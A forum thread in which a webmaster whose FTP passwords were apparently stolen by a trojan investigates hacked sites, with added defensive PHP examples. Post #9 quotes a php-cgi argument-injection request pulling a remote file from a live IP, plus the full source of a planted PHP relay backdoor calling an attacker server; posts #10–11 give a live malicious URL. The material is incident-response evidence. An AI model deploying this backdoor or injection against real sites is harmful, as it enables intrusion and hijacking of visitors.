MajorGeeks Support Forums

#1  gamecoding27, 06-11-12 18:57
security problems

It seems like every one of my websites for which I have saved passwords within FileZilla (my FTP client) has been hacked.

Code has either been inserted into PHP files and/or the .htaccess files have been altered so that clicking a link from Google to my pages redirects to someone else's website.

My question is: do you think that there is a connection between having the passwords saved and the sites being hacked? Does this sound like my computer has a virus?

I also just noticed that when I delete or copy/paste a file I need to manually refresh for it to show up or disappear.

As for my websites, I did the coding myself and have been lazy on some of my websites where information can be inputted; does it sound like somebody is just taking advantage of that?

Aside from form inputs, I use JavaScript HTTP calls often on my websites, and it would not be hard to look at the script to see the website address along with the GET array being passed. Do you think that this would be a vulnerability as well?

Other than those two things (form inputs and GET arrays), can anyone point out some other areas I may need to secure? I have quite a few websites to go through and secure. I want to make a checklist of all areas I need to secure. For instance, would my file permissions have anything to do with this?

Thanks for any advice.
#2  PC-XT, 06-11-12 21:42
Re: security problems

To check for spyware on your computer, follow the instructions in the READ & RUN ME FIRST Malware Removal Guide.

A good help in securing your sites that use GET requests is often to look at the log files for strange things like SQL or PHP code, to know what people have tried. If they have gained enough access, they can change the log files, though, so this isn't always accurate.

The way to secure user input is to not use any user value, (even select boxes or checkboxes, which can be edited by those who know how,) until it's been filtered for SQL, PHP, JavaScript, VBScript, CSS, HTML, or any other languages the variable may come in contact with. (Filter on the server. Filtering in the client can be bypassed.) If it's a number, parsing it into a numeric variable is usually sufficient. Never insert a raw input directly into SQL, eval, or the like, because that will make injection attacks very easy.

Searching for "protecting against php injection attacks" will give a lot of advice. It's good to look at more than a few pages, because they too often miss some small thing that an attacker won't.
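Added example, in PHP since that is what the sites are written in; it is not code from the thread. It shows the server-side filtering PC-XT describes as a vulnerable lookup next to its hardened form: validate the type and reject what does not fit, bind values in a prepared statement, treat <select> values as untrusted, and encode on output. The users table, its rows and the attacker input are constructed, and PDO with an in-memory SQLite database (pdo_sqlite extension assumed) is used only so the file runs stand-alone. Two caveats for this thread: the GET parameter names being visible in a page's JavaScript is not the flaw, trusting their values on the server is; and none of this stops files edited over FTP with stolen credentials, which is the more likely route here, since FileZilla of that era kept saved passwords in plain text in sitemanager.xml and recentservers.xml under %APPDATA%\FileZilla, exactly where password-stealing trojans look.

```php
<?php
// Added example (not from the thread): the same user lookup written the
// vulnerable way and the hardened way, run against a constructed in-memory
// SQLite table so the file works stand-alone (pdo_sqlite assumed).

function make_db(): PDO
{
    $pdo = new PDO('sqlite::memory:');
    $pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $pdo->exec('CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT)');
    $pdo->exec("INSERT INTO users VALUES (1, 'alice'), (2, 'bob'), (3, 'carol')");
    return $pdo;
}

// VULNERABLE: the raw request value is pasted into the SQL text, so
// "1 OR 1=1" returns every row and "1; DROP TABLE ..." is only a
// driver setting away from working.
function user_vulnerable(PDO $pdo, string $id): array
{
    $rows = $pdo->query("SELECT name FROM users WHERE id = $id");
    return $rows->fetchAll(PDO::FETCH_COLUMN);
}

// HARDENED: validate the type first (reject, do not "clean"), then bind the
// value so the database never sees it as SQL.
function user_safe(PDO $pdo, string $id): array
{
    $n = filter_var($id, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($n === false) {
        return [];                      // or answer HTTP 400; never fall through
    }
    $stmt = $pdo->prepare('SELECT name FROM users WHERE id = :id');
    $stmt->execute([':id' => $n]);
    return $stmt->fetchAll(PDO::FETCH_COLUMN);
}

// A value that came from a <select> or checkbox is still user input: map it
// through a server-side whitelist and use the matched key, never the raw string.
function sort_column(string $requested): string
{
    $allowed = ['name' => 'name', 'id' => 'id'];
    return $allowed[$requested] ?? 'id';
}

// Output encoding: text going into HTML is escaped at the point of output,
// which neutralises script injection regardless of what was stored.
function render_comment(string $text): string
{
    return '<p>' . htmlspecialchars($text, ENT_QUOTES | ENT_HTML5, 'UTF-8') . '</p>';
}

$pdo       = make_db();
$injection = '1 OR 1=1';                // constructed attacker input

printf("vulnerable: %s\n", implode(',', user_vulnerable($pdo, $injection)));
printf("hardened:   %s\n", implode(',', user_safe($pdo, $injection)));
printf("hardened:   %s\n", implode(',', user_safe($pdo, '2')));
printf("sort by:    %s\n", sort_column('name; DROP TABLE users'));
echo render_comment('<script>alert(1)</script>'), "\n";
```

Run it with `php filename.php`: the vulnerable lookup hands back all three names for the injected value, the hardened one returns nothing for it and only "bob" for a real id, the sort whitelist falls back to "id", and the comment comes out as inert text. The same pattern applies to every input channel PC-XT lists in post #5: the transport (GET, POST, AJAX header, custom method) changes nothing about what the server must do.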
#3  gamecoding27, 06-11-12 22:09
Re: security problems

Thank you for the information, I will go read around right now.

By the way, I do have a good idea how I can secure the inputs; I am mainly wondering if anyone knows of any common ways, besides address GET and form GET and POST inputting, that I should be aware of.
#4  gamecoding27, 06-12-12 08:27
Re: security problems

Hey guys, I have a quick question while I am going through the READ & RUN ME FIRST.

I was just checking my list of startup items and I noticed a weird one: 'Ruabomgu'

which runs the command 'C:\Users\xyz\AppData\Roaming\Sygegy\ihig.exe'

I checked inside the Roaming folder and noticed that a lot of my programs which require passwords, including my FTP program which I think someone stole my passwords from, are all listed in the Roaming folder. Is the Roaming folder a vulnerability?

I would imagine that the READ & RUN ME FIRST might fix this; I am just trying to understand how they got my information.
#5  PC-XT, 06-12-12 16:13
Re: security problems

I can't find anything about Ruabomgu or Sygegy, so I assume it's not a common startup item, and the names sound suspicious. If, for some reason, the READ & RUN ME FIRST guide doesn't take care of it, ask in the malware section, attaching the logs. Approved volunteer malware experts give one-on-one help there, as they have time. It's the best free help for this stuff that I've found.


Alternative inputs:
You can input via HTTP headers using AJAX, but they are less compatible with some implementations, and they aren't usually used to transfer large blocks of information. I've also heard of using custom methods in forms, but it's still basically the same as GET or POST.

The way input is received doesn't really matter in server security, since someone who knows how can still change the inputs at will. Changing the method will just delay this. The server should filter all the inputs as if they could contain malicious code before using them, regardless of how they arrived.
#6  gamecoding27, 06-12-12 21:52
Re: security problems

When you say that the server should filter it, do you mean server-side code (PHP) instead of front end (JavaScript)?

I am asking because my hosting company is telling me that the security has nothing to do with their servers and everything to do with the code being vulnerable.
#7  PC-XT, 06-13-12 22:50
Re: security problems

Yes. When I said server, I meant the code that takes the relevant input, processes it, and replies to the client. It's good to validate stuff with JavaScript, too, but the server (whatever code uses the validated stuff) can't rely on it actually being validated. I don't know if that is an issue with your code, but I see too many vulnerabilities in general from this, so I mentioned it. It's more of a problem with AJAX, because JavaScript must be turned on for it to work, so it's easier to rely on it too much, forgetting that it can be circumvented.

Sorry for the confusion. I hope it's not too hard to get rid of the spyware, if that's what it is, and any code vulnerabilities.
#8  gamecoding27, 06-13-12 23:22
Re: security problems

PC-XT, thank you very much for the help. I did have a trojan virus on my computer, but it was easy to get rid of.

My websites had about 30 .htaccess files and code inserts throughout.

As for using JavaScript, do you just mean like urlencode? Or what else would you do?
#9  gamecoding27, 06-14-12 01:25
Re: security problems

Quick update: I was searching through my log files today after restoring my pages and adding some security features. One of the lines caught my eye:

"GET /index.php?-dsafe_mode%3dOff+-ddisable_functions%3dNULL+-dallow_url_fopen%3dOn+-dallow_url_include%3dOn+-dauto_prepend_file%3dhttp%3A%2F%2F81.17.24.83%2Finfo3.txt HTTP/1.1" 200 8346


That specific index file does not use the GET array. It looks suspect to me, but I am not exactly sure what it is doing. The info3.txt looked like the end of a file, so I went searching through my directories for it; I did not find it. But I did find what appears to be a trojan gateway type of PHP file which I did not create. It was called "ok.php". I am trying to understand how someone can add a PHP file to my website; would they need my password, or is some type of cross browser scripting possible to create a new PHP file like this:


<?php
// URL of the origin (attacker's) server.
$url = "http://77.91.204.236/celka/update.php";

@error_reporting(0); @set_time_limit(0);

// Connect to the origin server.
$url = @parse_url($url);
if (!isset($url['port'])) $url['port'] = 80;
if (($real_server = @fsockopen($url['host'], $url['port'])) === false) die('E1');

// Get the data to forward (the raw body of the incoming request).
if (($data = @file_get_contents('php://input')) === false) $data = '';

// Build the request, passing the visitor's IP along as a query parameter.
$request = "POST {$url['path']}?ip=".urlencode($_SERVER['REMOTE_ADDR'])." HTTP/1.1\r\n";
$request .= "Host: {$url['host']}\r\n";

if (!empty($_SERVER['HTTP_USER_AGENT'])) $request .= "User-Agent: {$_SERVER['HTTP_USER_AGENT']}\r\n";

//$request .= "Content-Type: application/x-www-form-urlencoded\r\n";
$request .= "Content-Length: ".strlen($data)."\r\n";
$request .= "Connection: Close\r\n";

// Send it.
fwrite($real_server, $request."\r\n".$data);

// Read the response.
$result = '';
while (!feof($real_server)) $result .= fread($real_server, 1024);
fclose($real_server);

// Output the response body (everything after the header block) to the visitor.
echo substr($result, strpos($result, "\r\n\r\n") + 4);
?>



EDIT: I did a search on that last bit:
http%3A%2F%2F81.17.24.83%2Finfo3.txt
which when I looked at it closer is clearly:
http://81.17.24.83/info3.txt

They are talking about cross browser scripting attempts using the same line that I am seeing in my log file. Is anyone familiar with how they get that back door file onto your site in the first place? Is that the same as XSS?

#10  gamecoding27, 06-14-12 01:39
Re: security problems

Bingo: http://81.17.24.83/info2.txt - I just started changing the number on info#.txt and came across that file.
It is the code that has been getting inserted into my files.
#11  gamecoding27, 06-14-12 20:33
Re: security problems

Guys, do not open the website link that I posted: http://81.17.24.83/info2.txt

I believe it gave me a trojan when I went to it; plus they got my IP and started attacking my computer...

I just ran superantivirus and re-installed Mozilla. It seems that Mozilla and Chrome are both hijacked. When I try to come to this website, "majorgeeks.com", I am sent to the Hotmail login.

Internet Explorer is the only browser I can get to come here.
#12  PC-XT, 06-15-12 00:46
Re: security problems

Sometimes leaving your modem off for a while will change your ip. http://forums.majorgeeks.com/showthread.php?t=223570

The Malware Removal section helps with hijacked or redirecting browsers, too.

The -d switches in the URL were attempts to override options in the php.ini file, like using ini_set(). I don't know if they were successful or not. You could try overriding a php.ini option in this way for a test PHP file that just displays their values to see if it's a vulnerability:
.../test.php?-doption=value
I found the same attack on another site. Since the given file apparently doesn't exist, it's probably just used to mark the IP as vulnerable to attack.

It is possible to use php injection to add a file, if they can get php code to execute.

By JavaScript validation, I mean checking that things sent to the server are in the right range and format that is expected by the server, so that it doesn't need to send as many error messages. It saves time and bandwidth, but technically doesn't improve security. The server code should still do the same checks, either way.
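Added example, not from the thread: the log line in post #9 is the php-cgi argument injection (CVE-2012-1823), and the mechanism PC-XT is guessing at works like this. Per the CGI specification, a query string that contains no literal "=" is URL-decoded by the web server, split on "+", and passed to the CGI program as command-line arguments (that is why every "=" in the request is encoded as %3d). Unpatched php-cgi accepted its own switches that way, so "-d" sets any ini value for that one request (in memory, the php.ini file itself is untouched), "-dauto_prepend_file=http://..." together with "-dallow_url_include=On" makes PHP fetch and run the attacker's file before the requested script, and "-s" prints a script's source. mod_php is not affected, only the CGI SAPI. The scanner below runs over constructed log lines (the first reproduces the request quoted in the thread; the client addresses are documentation IPs) and reports the switches, the ini overrides and any remote file pulled in. A 200 only means the request was handled; whether the switches took effect is what the probe PC-XT suggests settles.

```php
<?php
// Added example, not from the thread: scan access-log lines for the php-cgi
// argument injection (CVE-2012-1823) seen in post #9. The log lines below are
// constructed; the first reproduces the request quoted in the thread.

// Switches php-cgi honoured from argv before the fix.
const PHP_CGI_SWITCHES = ['-d', '-s', '-n', '-c', '-T', '-i', '-v', '-h', '-z'];

// Returns null for a harmless line, otherwise a summary of the injection.
function detect_php_cgi_injection(string $line): ?array
{
    // Pull "METHOD /target HTTP/x.y" and the status out of a combined-format line.
    if (!preg_match('#"(?:GET|POST|HEAD)\s+(\S+)\s+HTTP/[\d.]+"\s+(\d{3})#', $line, $m)) {
        return null;
    }
    $target = $m[1];
    $status = (int) $m[2];
    $qpos   = strpos($target, '?');
    if ($qpos === false) {
        return null;
    }
    $query = substr($target, $qpos + 1);
    // Only a query with no raw '=' is handed over as argv; an encoded %3d does not count.
    if (strpos($query, '=') !== false) {
        return null;
    }
    // The server splits on '+' before decoding each piece, so do the same.
    $args = array_map('rawurldecode', explode('+', $query));

    $switches = [];
    $ini      = [];
    foreach ($args as $arg) {
        foreach (PHP_CGI_SWITCHES as $sw) {
            if (strncmp($arg, $sw, 2) !== 0) {
                continue;
            }
            $switches[$sw] = true;
            if ($sw === '-d' && strpos($arg, '=') !== false) {
                [$name, $value] = explode('=', substr($arg, 2), 2);
                $ini[$name] = $value;
            }
            break;
        }
    }
    if ($switches === []) {
        return null;
    }
    $prepend = $ini['auto_prepend_file'] ?? '';
    return [
        'path'     => substr($target, 0, $qpos),
        'status'   => $status,
        'switches' => array_keys($switches),
        'ini'      => $ini,
        // A URL scheme in auto_prepend_file means remote code was pulled in.
        'remote'   => preg_match('#^[a-z][a-z0-9+.-]*://#i', $prepend) ? $prepend : null,
    ];
}

// Constructed sample log lines (Apache combined format).
$log = [
    '203.0.113.7 - - [13/Jun/2012:23:10:01 -0500] "GET /index.php?-dsafe_mode%3dOff+-ddisable_functions%3dNULL+-dallow_url_fopen%3dOn+-dallow_url_include%3dOn+-dauto_prepend_file%3dhttp%3A%2F%2F81.17.24.83%2Finfo3.txt HTTP/1.1" 200 8346',
    '203.0.113.7 - - [13/Jun/2012:23:10:02 -0500] "GET /index.php?-s HTTP/1.1" 200 5120',
    '198.51.100.4 - - [13/Jun/2012:23:11:09 -0500] "GET /index.php?page=home HTTP/1.1" 200 3011',
    '198.51.100.4 - - [13/Jun/2012:23:11:10 -0500] "GET /index.php?page+home HTTP/1.1" 200 3011',
];

foreach ($log as $line) {
    $hit = detect_php_cgi_injection($line);
    if ($hit === null) {
        continue;
    }
    printf("ALERT %s status=%d switches=%s\n", $hit['path'], $hit['status'], implode(' ', $hit['switches']));
    foreach ($hit['ini'] as $name => $value) {
        printf("   -d %s=%s\n", $name, $value);
    }
    if ($hit['remote'] !== null) {
        printf("   remote code prepended from %s\n", $hit['remote']);
    }
}
```

The third and fourth lines are deliberately benign: one has a real "=" and so is never passed as arguments, the other has no "=" but carries no switch. Pipe a real log through the function one line at a time; anything it flags is worth checking against the file timestamps of the .htaccess and PHP files that were modified.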
#13  gamecoding27, 06-15-12 02:53
Re: security problems

PC-XT, thanks for responding again.

I talked to my internet company and they told me it resets every 24 hours, but they reset it for me right then.

The malware removal section cleared the hijacked browsers right up (specifically ComboFix).

In my php.ini file all of the variables they are trying to manipulate are set at the values they are trying to set, besides the "-dauto_prepend_file", which is NULL.

Do you know what safe mode is? Is it normally on?
#14  gamecoding27, 06-15-12 02:59
Re: security problems

PC-XT, thanks for responding again.

The malware removal got rid of the browser problem with no problems, specifically ComboFix.

I contacted my internet company and they told me that my IP changes every 24 hours, but they changed it right then to be safe.

It looks like all of the values are set like they want in the php.ini with the -d switches they are running, except for the last one with the URL: -dauto_prepend_file%3dhttp%3A%2F%2F81.17.24.83%2Finfo3.txt HTTP/1.1" 200 8346

Those don't seem like safe settings, but I am not familiar with what those values were before they were messing with them.

I will do like you said and test that command myself.
#15  gamecoding27, 06-15-12 03:13
Re: security problems

Quote:
You could try overriding a php.ini option in this way for a test php file that just displays their values to see if it's a vulnerability:
.../test.php?-doption=value
PC-XT, thank you for responding again. When you say that those switches override them, do you mean that they will change the values in the file? Or just "override" the value in the file, or ignore it and use the value they are passing in?

And when you say to test the values, would you just do phpinfo(), or what do you mean?

Thanks for all of the other detail too.
#16  PC-XT, 06-15-12 21:37
Re: security problems

I'm glad to hear problems are getting fixed.

Safe mode is off by default, unless the host requires it to be on. I believe it has been removed from the latest version of PHP. It was sort of a hack to correct for systems that didn't provide adequate security.
http://www.php.net/manual/en/features.safe-mode.php
http://www.php.net/manual/en/feature....functions.php
http://www.php.net/manual/en/ini.sect.safe-mode.php
http://docs.joomla.org/Why_shouldn%2...P_safe_mode%3F

As for the test PHP file, it could be just
<?php
echo(ini_get('safe_mode'));
?>
with whatever settings you are trying to override via the -d switch. If it does override settings, I think it's just for that particular time the script and any included files are called, ignoring the ini file, but I'm not sure. The command line options are listed here, but they may work differently in a url, if they even work at all:
http://www.php.net/manual/en/feature...ne.options.php

This might be another test file:
<?php
phpinfo(4);
?>
I'm not sure which is best.
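Added example, not from the thread: a self-test in the spirit of the test.php PC-XT sketches, but with a sentinel that gives an unambiguous answer and does nothing harmful. It answers gamecoding27's question directly: a "-d" switch changes the value only in that request's process, never in php.ini, so the file on disk tells you nothing and the check has to be made from the running script. The file name /cgiprobe.php is an assumption. Upload it, request it once plainly and once as /cgiprobe.php?-dprecision%3d3, compare the verdicts, and delete it afterwards. "precision" is used because no host runs with it set to 3 and overriding it is harmless; the %3d keeps a literal "=" out of the query string, which is the condition under which the server passes the query to php-cgi as arguments.

```php
<?php
// Added example, not from the thread: harmless probe for the php-cgi
// query-string switch injection (CVE-2012-1823). Request this file twice,
// once plainly and once as ?-dprecision%3d3, compare, then delete it.

function cgi_probe(): array
{
    // If the -d switch reached php-cgi, 'precision' is now "3" for this request.
    $sentinel = ini_get('precision') === '3';
    // Only the CGI SAPI takes argv from the query string; mod_php does not.
    $isCgi = in_array(PHP_SAPI, ['cgi', 'cgi-fcgi'], true);

    if ($sentinel) {
        $verdict = 'VULNERABLE: a -d switch in the query string changed an ini value';
    } elseif (!$isCgi) {
        $verdict = 'not affected: SAPI ' . PHP_SAPI . ' does not take query-string arguments';
    } else {
        $verdict = 'switch not applied (patched, blocked, or requested without it)';
    }

    return [
        'php_version'       => PHP_VERSION,
        'sapi'              => PHP_SAPI,
        'precision'         => ini_get('precision'),
        'allow_url_include' => ini_get('allow_url_include') ?: '0',
        'auto_prepend_file' => ini_get('auto_prepend_file') ?: '(none)',
        'verdict'           => $verdict,
    ];
}

header('Content-Type: text/plain');
foreach (cgi_probe() as $key => $value) {
    printf("%-18s %s\n", $key, $value);
}
```

If the second request reports VULNERABLE, every PHP file on that host can be fed an attacker-chosen auto_prepend_file exactly as the logged request did, and the host needs the PHP update (or the .htaccess stopgap from the bug report linked in the last post) before anything else is worth doing.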
#17  gamecoding27, 06-16-12 04:26
Re: security problems

PC-XT, thanks again for all of your help, buddy. Someone passed me along this link: https://bugs.php.net/bug.php?id=61910

It turns out that it was fixed in a recent PHP patch. For anyone on an older version of PHP (or non-Apache, I think) there is a .htaccess bit in the comments that prevents the -d, -s and other switches from being used in the URL.
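Added for reference, not from the thread: the rewrite rule published alongside the PHP fix for this bug (PHP 5.3.12 and 5.4.2; that first fix was incomplete and tracked as CVE-2012-2311, completed in 5.3.13 and 5.4.3, so anything older than those should be updated rather than relying on the rule). It works only where Apache with mod_rewrite reads the site's .htaccess, and it refuses every query string that has no "=" and contains a dash, including legitimate ones of that shape, which is the price of a stopgap.

```apache
# Added stopgap (the rule from the PHP 5.3.12/5.4.2 advisory, not from this
# thread). Requires mod_rewrite and AllowOverride permitting .htaccess rules.
RewriteEngine On
# A query string with no '=' is what the server passes to php-cgi as
# arguments; refuse such a query if it carries a '-' (raw or %2d-encoded).
RewriteCond %{QUERY_STRING} ^[^=]*$
RewriteCond %{QUERY_STRING} %2d|\- [NC]
RewriteRule .? - [F,L]
```

After adding it, the request from post #9 should come back 403 instead of 200, and the probe above should report "switch not applied". Then rotate every FTP password that FileZilla had saved, since the trojan on the workstation, not the web code, is the most likely source of the original file edits.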